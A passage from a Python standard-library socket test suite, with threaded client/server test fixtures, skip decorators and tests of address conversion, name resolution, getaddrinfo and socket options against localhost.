def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
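# Illustrative sketch (class and method names invented): the testFoo/_testFoo
# pairing described in the ThreadableTest docstring, built on the connected
# fixture defined directly above.
@unittest.skipUnless(thread, 'Threading required for this test.')
class ExampleEchoPairTest(SocketConnectedTest):
    def testEcho(self):
        # Server half: runs in the main thread after setUp() has accept()ed.
        self.assertEqual(self.cli_conn.recv(1024), MSG)
    def _testEcho(self):
        # Client half: runs in the spawned client thread once the server is ready.
        self.serv_conn.send(MSG)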
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
sock.bind(path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
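# Illustration only (class name invented, no tests defined): combining the
# mixins exactly as the comment above describes yields a connected TCP fixture
# equivalent to SocketConnectedTest, with serv_addr and cli_addr populated.
class ExampleConnectedTCPFixture(ConnectedStreamTestMixin, TCPTestBase):
    pass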
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
self.assertRaises(OSError, socket.gethostbyname, addr)
self.assertRaises(OSError, socket.gethostbyaddr, addr)
for addr in [support.HOST, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOST]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
def testNtoHErrors(self):
good_values = [ 1, 2, 3, 1, 2, 3 ]
bad_values = [ -1, -2, -3, -1, -2, -3 ]
for k in good_values:
socket.ntohl(k)
socket.ntohs(k)
socket.htonl(k)
socket.htons(k)
for k in bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htonl, k)
self.assertRaises(OverflowError, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as it has a
# non-standard port/protocol entry that breaks this test's assumptions
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:')
assertInvalid('1:2:3:4:5:6:7:8:0')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it is reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# A freshly created socket should start with SO_REUSEADDR == 0 (reuse disabled)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
